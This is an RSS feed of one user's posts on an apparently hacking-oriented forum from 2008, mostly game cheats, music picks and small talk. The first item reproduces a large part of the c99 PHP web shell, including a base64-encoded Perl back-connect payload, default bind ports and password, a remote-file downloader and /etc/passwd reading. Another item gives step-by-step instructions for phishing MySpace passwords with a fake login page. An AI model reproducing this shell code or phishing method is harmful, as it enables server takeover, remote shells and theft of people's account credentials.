<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
	<title>Palm3R - Rss Feed</title>
	<link>http://www.anarchistcookbook.com/member.php?u=9309</link>
	<description>A social site powered by it's members</description>
	<language>en</language>
	<generator>H.Atakan KOC www.sonkonu.com</generator>
	<ttl>60</ttl>
		<item>
			<title>c99.shell</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=22098</link>
			<pubDate>Mon, 17 Nov 2008 01:49:32 GMT</pubDate>
			<description><![CDATA[//Starting calls 
ini_set("max_execution_time",0); 
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ",...]]></description>
			<content:encoded><![CDATA[<font color="Red"><br />
//Starting calls<br />
ini_set(&quot;max_execution_time&quot;,0);<br />
if (!function_exists(&quot;getmicrotime&quot;)) {function getmicrotime() {list($usec, $sec) = explode(&quot; &quot;, microtime()); return ((float)$usec + (float)$sec);}}<br />
error_reporting(5);<br />
$adires=&quot;&quot;;<br />
@ignore_user_abort(TRUE);<br />
@set_magic_quotes_runtime(0);<br />
$win = strtolower(substr(PHP_OS,0,3)) == &quot;win&quot;;<br />
define(&quot;starttime&quot;,getmicrotime());<br />
if (get_magic_quotes_gpc()) {if (!function_exists(&quot;strips&quot;)) {function strips(&amp;$arr,$k=&quot;&quot;) {if (is_array($arr)) {foreach($arr as $k=&gt;$v) {if (strtoupper($k) != &quot;GLOBALS&quot;) {strips($arr[&quot;$k&quot;]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}<br />
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);<br />
foreach($_REQUEST as $k=&gt;$v) {if (!isset($$k)) {$$k = $v;}}<br />
<br />
$shver = &quot;1.0 pre-release build #16&quot;; //Current version<br />
//CONFIGURATION AND SETTINGS<br />
if (!empty($unset_surl)) {setcookie(&quot;c99sh_surl&quot;); $surl = &quot;&quot;;}<br />
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(&quot;c99sh_surl&quot;,$surl);}<br />
else {$surl = $_REQUEST[&quot;c99sh_surl&quot;]; //Set this cookie for manual SURL<br />
}<br />
<br />
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.<br />
<br />
if ($surl_autofill_include and !$_REQUEST[&quot;c99sh_surl&quot;]) {$include = &quot;&amp;&quot;; foreach (explode(&quot;&amp;&quot;,getenv(&quot;QUERY_STRING&quot;)) as $v) {$v = explode(&quot;=&quot;,$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(&quot;http://&quot;,&quot;https://&quot;,&quot;ssl://&quot;,&quot;ftp://&quot;,&quot;\\\\&quot;) as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name).&quot;=&quot;.urlencode($value).&quot;&amp;&quot;;}}} if ($_REQUEST[&quot;surl_autofill_include&quot;]) {$includestr .= &quot;surl_autofill_include=1&amp;&quot;;}}<br />
if (empty($surl))<br />
{<br />
$surl = &quot;?&quot;.$includestr; //Self url<br />
}<br />
$surl = htmlspecialchars($surl);<br />
<br />
$ti***imit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.<br />
<br />
//Authentication<br />
$login = &quot;&quot;; //login<br />
//DON'T FORGOT ABOUT PASSWORD!!!<br />
$pass = &quot;&quot;; //password<br />
$md5_pass = &quot;&quot;; //md5-cryped pass. if null, md5($pass)<br />
<br />
$host_allow = array(&quot;*&quot;); //array (&quot;{mask}1&quot;,&quot;{mask}2&quot;,...), {mask} = IP or HOST e.g. array(&quot;192.168.0.*&quot;,&quot;127.0.0.1&quot;)<br />
$login_txt = &quot;Restricted area&quot;; //http-auth message.<br />
$accessdeniedmess = &quot;&lt;a href=\&quot;http://ccteam.ru/releases/c99shell\&quot;&gt;c99shell v.&quot;.$shver.&quot;&lt;/a&gt;: access denied&quot;;<br />
<br />
$gzipencode = TRUE; //Encode with gzip?<br />
<br />
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)<br />
<br />
$c99sh_updateurl = &quot;http://ccteam.ru/update/c99shell/&quot;; //Update server<br />
$c99sh_sourcesurl = &quot;http://ccteam.ru/files/c99sh_sources/&quot;; //Sources-server<br />
<br />
$filestealth = TRUE; //if TRUE, don't change modify- and access-time<br />
<br />
$donated_html = &quot;&lt;center&gt;&lt;b&gt;C99 Modified By Psych0 &lt;/b&gt;&lt;/center&gt;&quot;;<br />
/* If you publish free shell and you wish<br />
add link to your site or any other information,<br />
put here your html. */<br />
$donated_act = array(&quot;&quot;); //array (&quot;act1&quot;,&quot;act2,&quot;...), if $act is in this array, display $donated_html.<br />
<br />
$curdir = &quot;./&quot;; //start folder<br />
//$curdir = getenv(&quot;DOCUMENT_ROOT&quot;);<br />
$tmpdir = &quot;&quot;; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)<br />
$tmpdir_log = &quot;./&quot;; //Directory logs of long processes (e.g. brute, scan...)<br />
<br />
$log_email = &quot;user@host.tld&quot;; //Default e-mail for sending logs<br />
<br />
$sort_default = &quot;0a&quot;; //Default sorting, 0 - number of colomn, &quot;a&quot;scending or &quot;d&quot;escending<br />
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.<br />
<br />
// Registered file-types.<br />
// array(<br />
// &quot;{action1}&quot;=&gt;array(&quot;ext1&quot;,&quot;ext2&quot;,&quot;ext3&quot;,...),<br />
// &quot;{action2}&quot;=&gt;array(&quot;ext4&quot;,&quot;ext5&quot;,&quot;ext6&quot;,...),<br />
// ...<br />
// )<br />
$ftypes = array(<br />
&quot;html&quot;=&gt;array(&quot;html&quot;,&quot;htm&quot;,&quot;shtml&quot;),<br />
&quot;txt&quot;=&gt;array(&quot;txt&quot;,&quot;conf&quot;,&quot;bat&quot;,&quot;sh&quot;,&quot;js&quot;,&quot;bak&quot;,&quot;d  oc&quot;,&quot;log&quot;,&quot;sfc&quot;,&quot;cfg&quot;,&quot;htaccess&quot;),<br />
&quot;exe&quot;=&gt;array(&quot;sh&quot;,&quot;install&quot;,&quot;bat&quot;,&quot;cmd&quot;),<br />
&quot;ini&quot;=&gt;array(&quot;ini&quot;,&quot;inf&quot;),<br />
&quot;code&quot;=&gt;array(&quot;php&quot;,&quot;phtml&quot;,&quot;php3&quot;,&quot;php4&quot;,&quot;inc&quot;,&quot;t  cl&quot;,&quot;h&quot;,&quot;c&quot;,&quot;cpp&quot;,&quot;py&quot;,&quot;cgi&quot;,&quot;pl&quot;),<br />
&quot;img&quot;=&gt;array(&quot;gif&quot;,&quot;png&quot;,&quot;jpeg&quot;,&quot;jfif&quot;,&quot;jpg&quot;,&quot;jpe&quot;  ,&quot;bmp&quot;,&quot;ico&quot;,&quot;tif&quot;,&quot;tiff&quot;,&quot;avi&quot;,&quot;mpg&quot;,&quot;mpeg&quot;),<br />
&quot;sdb&quot;=&gt;array(&quot;sdb&quot;),<br />
&quot;phpsess&quot;=&gt;array(&quot;sess&quot;),<br />
&quot;download&quot;=&gt;array(&quot;exe&quot;,&quot;com&quot;,&quot;pif&quot;,&quot;src&quot;,&quot;lnk&quot;,&quot;z  ip&quot;,&quot;rar&quot;,&quot;gz&quot;,&quot;tar&quot;)<br />
);<br />
<br />
// Registered executable file-types.<br />
// array(<br />
// string &quot;command{i}&quot;=&gt;array(&quot;ext1&quot;,&quot;ext2&quot;,&quot;ext3&quot;,...),<br />
// ...<br />
// )<br />
// {command}: %f% = filename<br />
$dizin = str_replace(&quot;\\&quot;,DIRECTORY_SEPARATOR,$dizin);<br />
if (empty($dizin)) {$dizin = realpath(&quot;.&quot;);} elseif(realpath($dizin)) {$dizin = realpath($dizin);}<br />
$dizin = str_replace(&quot;\\&quot;,DIRECTORY_SEPARATOR,$dizin);<br />
if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;}<br />
$dizin = str_replace(&quot;\\\\&quot;,&quot;\\&quot;,$dizin);<br />
$dizinispd = htmlspecialchars($dizin);<br />
/*dizin*/<br />
$real = realpath($dizinispd);<br />
$path = basename ($PHP_SELF);<br />
function dosyayicek($link,$file)<br />
{<br />
$fp = @fopen($link,&quot;r&quot;);<br />
while(!feof($fp))<br />
{<br />
$cont.= fread($fp,1024);<br />
}<br />
fclose($fp);<br />
<br />
$fp2 = @fopen($file,&quot;w&quot;);<br />
fwrite($fp2,$cont);<br />
fclose($fp2);<br />
}<br />
<br />
<br />
<br />
<br />
$exeftypes = array(<br />
getenv(&quot;PHPRC&quot;).&quot; -q %f%&quot; =&gt; array(&quot;php&quot;,&quot;php3&quot;,&quot;php4&quot;),<br />
&quot;perl %f%&quot; =&gt; array(&quot;pl&quot;,&quot;cgi&quot;)<br />
);<br />
<br />
/* Highlighted files.<br />
array(<br />
i=&gt;array({regexp},{type},{opentag},{closetag},{bre  ak})<br />
...<br />
)<br />
string {regexp} - regular exp.<br />
int {type}:<br />
0 - files and folders (as default),<br />
1 - files only, 2 - folders only<br />
string {opentag} - open html-tag, e.g. &quot;&lt;b&gt;&quot; (default)<br />
string {closetag} - close html-tag, e.g. &quot;&lt;/b&gt;&quot; (default)<br />
bool {break} - if TRUE and found match then break<br />
*/<br />
$regxp_highlight = array(<br />
array(basename($_SERVER[&quot;PHP_SELF&quot;]),1,&quot;&lt;font color=\&quot;yellow\&quot;&gt;&quot;,&quot;&lt;/font&gt;&quot;), // example<br />
array(&quot;config.php&quot;,1) // example<br />
);<br />
<br />
$safemode_diskettes = array(&quot;a&quot;); // This variable for disabling diskett-errors.<br />
// array (i=&gt;{letter} ...); string {letter} - letter of a drive<br />
//$safemode_diskettes = range(&quot;a&quot;,&quot;z&quot;);<br />
$hexdump_lines = 8;// lines in hex preview file<br />
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line<br />
<br />
$nixpwdperpage = 100; // Get first N lines from /etc/passwd<br />
<br />
$bindport_pass = &quot;c99&quot;; // default password for binding<br />
$bindport_port = &quot;31373&quot;; // default port for binding<br />
$bc_port = &quot;31373&quot;; // default port for back-connect<br />
$datapipe_localport = &quot;8081&quot;; // default port for datapipe<br />
$back_connect=&quot;IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V  0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1b  mFtZSAtYWAiO2Vj<br />
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZX  Q9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1p  bmV0X2F0b24oJHR<br />
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyP  XNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJ  yb3I6ICQhXG4iKT<br />
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2Nr  ZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3  RvKSB8fCBkaWUoI<br />
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGR  yKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOL  CAiPiZTT0NLRVQi<br />
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1  RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsN  CmNsb3NlKFNUREl<br />
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==&quot;  ;<br />
<br />
</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=22098</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=11">Hacking</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>E&W: can someone explain?</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=21416</link>
			<pubDate>Mon, 06 Oct 2008 18:37:53 GMT</pubDate>
			<description><![CDATA[Someone tried to explain, but then someone else kicked me off the computer and closed my MSN window off... So I really didn't get to see what...]]></description>
			<content:encoded><![CDATA[<font color="Red">Someone tried to explain, but then someone else kicked me off the computer and closed my MSN window off... So I really didn't get to see what happened.<br />
<br />
Can someone explain why the <a href="http://explosivesandweapons.tk" target="_blank">explosivesandweapons.tk</a> forum has suddenly been deleted ??</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=21416</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Desolate Halls</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=21335</link>
			<pubDate>Sun, 28 Sep 2008 15:35:09 GMT</pubDate>
			<description><![CDATA[http://www.youtube.com/user/desolatehalls 
This is my new favorite 'non-famous' band. :D 
It's pretty much just a bunch of people from around where...]]></description>
			<content:encoded><![CDATA[<font color="Red"><br />
<a href="http://www.youtube.com/user/desolatehalls" target="_blank">http://www.youtube.com/user/desolatehalls</a><br />
This is my new favorite 'non-famous' band. <img src="images/smilies/biggrin.gif" border="0" alt="" title="Big Grin" class="inlineimg" /><br />
It's pretty much just a bunch of people from around where I'm at, but they're awesome. I usually go see them when they play on Fridays. They re-do a lot of good songs.<br />
<br />
Here is a video:<br />
remix of &quot;<i>Pain it black</i>&quot;<br />
<a href="http://www.youtube.com/watch?v=MOkXwT_nsfA&amp;feature=related" target="_blank">http://www.youtube.com/watch?v=MOkXw...eature=related</a><br />
<br />
They have a myspace to, just search &quot;Desolate Halls&quot; and you should get it.</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=21335</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=43">Hard Rock (Metal)</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Alternate language(s)</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=21158</link>
			<pubDate>Tue, 09 Sep 2008 01:02:00 GMT</pubDate>
			<description><![CDATA[Since we're a week into our school year already, some of you more than a week, and some that are already finished... 
 
What are all the alternative...]]></description>
			<content:encoded><![CDATA[<font color="Red">Since we're a week into our school year already, some of you more than a week, and some that are already finished...<br />
<br />
What are all the alternative languages you speak??</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=21158</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Missing DLL (really nede help!!)</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=20400</link>
			<pubDate>Thu, 31 Jul 2008 00:52:32 GMT</pubDate>
			<description><![CDATA[My dad's computer won't start XP, because it says there is a missing DLL file (hal.dll). getting the DLL is not a problem, I need to find a way to...]]></description>
			<content:encoded><![CDATA[<font color="Red">My dad's computer won't start XP, because it says there is a missing DLL file (hal.dll). getting the DLL is not a problem, I need to find a way to get it into the system32 folder from a Linux bootable disk. I'm not even sure how (or if it's possible) but I really need to get the dll back into the system32 folder. I'm not really that familiar with bootable disks, so I kinda need it explained to me.<br />
<br />
any help would be nice... </font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=20400</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=51">Help Me</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>web hosting?</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=20393</link>
			<pubDate>Wed, 30 Jul 2008 01:55:35 GMT</pubDate>
			<description><![CDATA[Does anyone know of a good web hosting site?? I've tried hostsnake, but it's down 24/7, and then when it's ok for use, it's only up for another 2...]]></description>
			<content:encoded><![CDATA[<font color="Red">Does anyone know of a good web hosting site?? I've tried hostsnake, but it's down 24/7, and then when it's ok for use, it's only up for another 2 minutes before it's down again. I have Googled this, and searched back for pages and pages. I found some really good ones, but they wouldn't keep hosting my files, or they deleted them etc...<br />
I've asked other people, and the best answer I got was a site that was completely in German...<br />
<br />
So yeah, does anyone know a really good web hosting site, (kinda like hostsnake) that isn't down all the time, that I can upload files on?? (and in English language)<br />
<br />
Any help would be nice.</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=20393</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=27">Common Questions</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>The Nickel trick.</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=20177</link>
			<pubDate>Tue, 08 Jul 2008 19:11:32 GMT</pubDate>
			<description><![CDATA[This is something I've wanted to try ever since I first watched this video. 
 
http://youtube.com/watch?v=_FmGj4XbQZc 
 
This guy actually did really...]]></description>
			<content:encoded><![CDATA[<font color="Red">This is something I've wanted to try ever since I first watched this video.<br />
<br />
<a href="http://youtube.com/watch?v=_FmGj4XbQZc" target="_blank">http://youtube.com/watch?v=_FmGj4XbQZc</a><br />
<br />
This guy actually did really good at it too, I've  seen a lot of people screw it up and do it wrong, but this is the best I've seen so far.</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=20177</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=54">Pranks</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Joke thread!</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19912</link>
			<pubDate>Sat, 24 May 2008 19:15:27 GMT</pubDate>
			<description><![CDATA[I haven't seen an actual thread dedicated to jokes for a long time now, so I figured I'd create one. 
Any jokes go here. just saty on topic and don't...]]></description>
			<content:encoded><![CDATA[<font color="Red">I haven't seen an actual thread dedicated to jokes for a long time now, so I figured I'd create one.<br />
Any jokes go here. just saty on topic and don't post things like &quot;that was a gay joke&quot; or something, cause that usually ruins threads or starts dumb arguements (or both).</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19912</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=19">Bullshit</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>I Killed the Prom Queen</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19901</link>
			<pubDate>Thu, 22 May 2008 19:38:47 GMT</pubDate>
			<description><![CDATA[I think this is a cool Australian Deathmetal band. Actually, it's the only Australian deathmetal band that I know, but I still think they're pretty...]]></description>
			<content:encoded><![CDATA[<font color="Red">I think this is a cool Australian Deathmetal band. Actually, it's the only Australian deathmetal band that I know, but I still think they're pretty cool.<br />
<br />
<script language="JavaScript" src="http://www.anarchistcookbook.com/audio/audio-player.js"></script>
<object type="application/x-shockwave-flash" data="http://www.anarchistcookbook.com/audio/player.swf" id="audioplayer4" height="24" width="290">
<param name="movie" value="http://www.anarchistcookbook.com/audio/player.swf">
<param name="FlashVars" value="playerID=4&amp;soundFile=http://uslw.net/content/members/therock/SrslyDontDeleteMe/IKilledThePromQueen-Say Goodbye_DontDeleteMe.mp3">
<param name="quality" value="high">
<param name="menu" value="false">
<param name="wmode" value="transparent">
</object><br />
<font color="Gray">I Killed the Prom Queen - Say Goodbye</font><br />
<br />
There is one of the good ones by them. Columbian Necktie is another good one. <img src="images/smilies/biggrin.gif" border="0" alt="" title="Big Grin" class="inlineimg" /></font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19901</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=43">Hard Rock (Metal)</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>The best stress relief game ever!!</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19843</link>
			<pubDate>Fri, 16 May 2008 06:19:16 GMT</pubDate>
			<description><![CDATA[You're probly gonna think I'm some kind of freak or something, but this is a really fun game. 
AWESOMEYAY.com - Awesome games are awesome, yay :3...]]></description>
			<content:encoded><![CDATA[<font color="Red">You're probly gonna think I'm some kind of freak or something, but this is a really fun game.<br />
<a href="http://awesomeyay.com/games.php?act=play&amp;id=340" target="_blank">AWESOMEYAY.com - Awesome games are awesome, yay :3</a><br />
<br />
Also... post pics if you actually get into this. ^^<br />
It might seem a little wierd, but it gets addicting. This is my new fav. XD</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19843</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=31">Games General Discussion</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Elder scrolls III: Morrowind, cool PC tricks.</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19799</link>
			<pubDate>Sat, 10 May 2008 21:30:26 GMT</pubDate>
			<description><![CDATA[So far, I haven't seen this on any of the cheat sites, but it's a cool trick. 
You can easily clone yourself in the morrowind game, by typing in a...]]></description>
			<content:encoded><![CDATA[<font color="Red">So far, I haven't seen this on any of the cheat sites, but it's a cool trick.<br />
You can easily clone yourself in the morrowind game, by typing in a really simple command line in the command box.<br />
first, to open the command box, (incase you don't know already), push the ` button (the button with ~ on it).<br />
all you have to do is type this exact command line: </font><br />
<font color="DarkRed">placeatpc &quot;playersavegame&quot; 1,20,1 result =</font><br />
<br />
<font color="Red">exactly like that.^^^<br />
don't forget the exact spacing, quotes, commas, and all that, otherwise it won't work right. Doing this might seem pointless, but if you have a lot of money, and items, when you kill your spawned character, then it will have the same inventory... which, when sold, can make you a lot of gold.<br />
<br />
You can also do that, but spawning different creatures/characters. Just put the name in the quotes (replacing the &quot;playersavegame&quot; line).<br />
example:<br />
placeatpc &quot;ogrim&quot; 1,20,1 result =<br />
<br />
apparently, a lot of people didn't know about this trick, so I thought I'd post it somewhere. you can spawn any creature or character... but it's best that you dispose of their body, so the game doesn't glitch and crash and stuff like that.<br />
Hint: if you spawn your own character, it might crash when you kill him/her and dispose of the body. it also might crash if you clone your character more then once... but any other monster, you can clone as may as you want.<br />
<br />
A few other tricks that work for PC.<br />
type these in the command box.<br />
TGM - toggle god mode<br />
TAI - toggle AI<br />
<br />
there's a bunch more like that, all you have to do is type &quot;help&quot; and it will give you all the commands.</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19799</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=32">Cheats</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>"Gaming Rig"</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19658</link>
			<pubDate>Tue, 29 Apr 2008 19:39:10 GMT</pubDate>
			<description><![CDATA[Just curious, stat's about your PC. 
go to my profile (http://www.xfire.com/profile/palmer640) and look at the bottom. It says "gaming rig" and it...]]></description>
			<content:encoded><![CDATA[<font color="Red">Just curious, stat's about your PC.<br />
go to <a href="http://www.xfire.com/profile/palmer640" target="_blank">my profile</a> and look at the bottom. It says &quot;gaming rig&quot; and it shows my computer stats.<br />
<a href="http://www.xfire.com/profile/palmer640/" target="_blank">Xfire - Palmer (palmer640)</a><br />
<br />
<a href="http://profile.xfire.com/palmer640" target="_blank"><img src="http://miniprofile.xfire.com/bg/co/type/0/palmer640.png" border="0" alt="" /></a><br />
<br />
You can make a profile, and just click &quot;upload Rig&quot; and it will get all this info on its own.<br />
here's mine:<br />
Manufacturer: Dell Inc. <br />
Processor: AMD Turion(tm) 64 X2 Mobile Technology TL-58 (2 CPUs), ~1.9GHz <br />
Memory: 1918MB RAM <br />
Hard Drive: 183 GB <br />
Video Card: ATI Radeon Xpress 1150 <br />
Monitor: Generic PnP Monitor <br />
Sound Card: Speakers (High Definition Audio Device) <br />
Speakers/Headphones:  <br />
Keyboard: USB Root Hub <br />
Mouse: USB Root Hub <br />
Mouse Surface:  <br />
Operating System: Windows Vista&#8482; Home Premium (6.0, Build 6000) (6000.vista_gdr.071023-1545) <br />
<br />
(It ain't the best, but everything runs perfect)</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19658</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=31">Games General Discussion</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Easy MySpace Phishing</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19654</link>
			<pubDate>Tue, 29 Apr 2008 18:31:47 GMT</pubDate>
			<description><![CDATA[I've seen a ton of threads on MySpace Hacking and phishing already, and I'm sick of seeing the same thing over, so I made a quick video on how to do...]]></description>
			<content:encoded><![CDATA[<font color="Red">I've seen a ton of threads on MySpace Hacking and phishing already, and I'm sick of seeing the same thing over, so I made a quick video on how to do it. This is one of the ways to phish a MySpace password. There are other (better) ways to do this, but this was the quickest and most simple way to do it.<br />
<br />
<a href="http://youtube.com/watch?v=iBd3ngzchpc" target="_blank">YouTube - Easy MySpace Phishing</a><br />
<br />
<br />
&quot;http://www.megaupload.com/?d=IZYGKZJH<br />
The link above is a download link that contains 3 of the files that you will need to do this. They are small files, so don't worry about how long it will take to download.<br />
<br />
go to <a href="http://www.hostsnake.com" target="_blank">HostSnake</a><br />
<br />
register/sign in<br />
<br />
go to &quot;FILE MANAGER&quot;<br />
<br />
You need to upload 3 files (which are included in the link at the top).<br />
-1 - Index.html<br />
--2 - password.txt<br />
---3 - post.php<br />
<br />
(I suggest using a fake account) Click the &quot;index.html.html&quot; and send the link in the address bar to someone, or post it somewhere.<br />
<br />
The only way to tell if someone actually signed in on it, go back to the File Manager page, and click refresh, then open &quot;passwords.txt&quot; and it will show exactly what they typed.<br />
<br />
Most people might not click on it, but you'd be surprised at how many passwords you can get from doing this. &quot;</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19654</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=11">Hacking</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>Railroad Tycoon PC cheats</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19620</link>
			<pubDate>Sun, 27 Apr 2008 23:34:39 GMT</pubDate>
			<description><![CDATA[Here's a few for Railroad Tycoon: 
 
Railroad Tycoon $500,000 
Press [Shift] + [F4] at the top layer of maps.  
 
Railroad Tycoon $1,000,000 
Start a...]]></description>
			<content:encoded><![CDATA[<font color="Red">Here's a few for Railroad Tycoon:<br />
<br />
Railroad Tycoon $500,000<br />
Press [Shift] + [F4] at the top layer of maps. <br />
<br />
Railroad Tycoon $1,000,000<br />
Start a new game. Then set about building a transcontinental railroad. You will receive a million dollar bonus if you are the first railroad company to have stations on both coasts.<br />
(Note: Cheat may be enabled once per game.)<br />
<br />
<br />
Railroad Tycoon $3,000,000<br />
Press [Shift] + [F1] + 4.<br />
<br />
(Note: Cheat may be enabled once per game.)<br />
</font>]]></content:encoded>
			<guid isPermaLink="true">http://www.anarchistcookbook.com/showthread.php?t=19620</guid>
			<category domain="http://www.anarchistcookbook.com/forumdisplay.php?f=32">Cheats</category>
			<dc:creator>Palm3R</dc:creator>>
		</item>
		<item>
			<title>GTA Vice City PC cheats</title>
			<link>http://www.anarchistcookbook.com/showthread.php?t=19619</link>
			<pubDate>Sun, 27 Apr 2008 23:23:43 GMT</pubDate>
			<description><![CDATA[Another set of cheats to go with my Download in "General Discussion." 
 
NOTE: Some Cheats don't work for certain copies of this game. I'm pretty...]]></description>
			<content:encoded><![CDATA[<font color="Red">Another set of cheats to go with my Download in &quot;General Discussion.&quot;<br />
<br />
NOTE: Some Cheats don't work for certain copies of this game. I'm pretty sure that if you're using a trainer (or other mods), it does disable cheats. Also, there are just some certain copies of the game that don't let you do cheats.<br />
have fun...<br />
<br />
<br />
<br />
CATSANDDOGS  Stormy Weather  <br />
<br />
CANTSEEATHING  Foggy Weather  <br />
<br />
ABITDRIEG  Dense Clouds  <br />
<br />
APLEASANTDAY  Light Clouds  <br />
<br />
ALOVELYDAY  Sunny/Clear Weather  <br />
<br />
LOADSOFLITTLETHINGS  Sportscars have big wheels  <br />
<br />
WHEELSAREALLINEED  Only the wheels of a car are visible  <br />
<br />
SEAWAYS  Cars can drive/hover over water  <br />
<br />
GREENLIGHT  All traffic lights are green  <br />
<br />
GRIPISEVERYTHING  Perfect Handling  <br />
<br />
COMEFLYWITHME  Cars can fly  <br />
<br />
IWANTITPAINTEDBLACK  All cars are black  <br />
<br />
AHAIRDRESSERSCAR  All cars are pink  <br />
<br />
MIAMITRAFFIC  Aggressive Drivers  <br />
<br />
BIGBANG  Blow up nearby cars  <br />
<br />
BETTERTHANWALKING  Spawn a Caddie  <br />
<br />
RUBBISHCAR  Spawn a Trashmaster  <br />
<br />
ROCKANDROLLCAR  Spawn Love Fist's Limo  <br />
<br />
THELASTRIDE  Spawn a Romero's Hearse  <br />
<br />
GETTHEREAMAZINGLYFAST  Spawn a Hotring Racer #2  <br />
<br />
GETTHEREVERYFASTINDEED  Spawn a Hotring Racer  <br />
<br />
GETTHEREFAST  Spawn a Sabre Turbo  <br />
<br />
GETTHEREQUICKLY  Spawn a Bloodring Banger #2  <br />
<br />
TRAVELINSTYLE  Spawn a Bloodring Banger  <br />
<br />
PANZER  Spawn a Rhino  <br />
<br />
FOXYLITTLETHING  Play as Mercedes  <br />
<br />
IDONTHAVETHEMONEYSONNY  Play as Sonny Forelli  <br />
<br />
ONEARMEDBANDIT  Play as Phil Cassidy  <br />
<br />
WELOVEOURDICK  Play as Love Fist character (Dick)  <br />
<br />
ROCKANDROLLMAN  Play as Love Fist character (Jezz Torent)  <br />
